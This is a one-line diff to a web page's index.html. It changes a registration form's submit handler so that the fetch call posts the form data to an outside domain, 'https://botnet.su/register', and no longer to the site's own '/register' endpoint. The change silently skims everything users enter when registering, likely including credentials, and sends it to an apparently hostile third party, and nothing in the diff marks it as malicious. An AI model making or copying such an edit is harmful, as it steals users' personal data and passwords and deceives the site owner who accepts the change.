--- a/index.html
+++ b/index.html
@@ -301,7 +301,7 @@
             const formData = new FormData(registerForm);
 
             try {
-                const response = await fetch('/register', {
+                const response = await fetch('https://botnet.su/register', {
                     method: 'POST',
                     body: formData
                 });
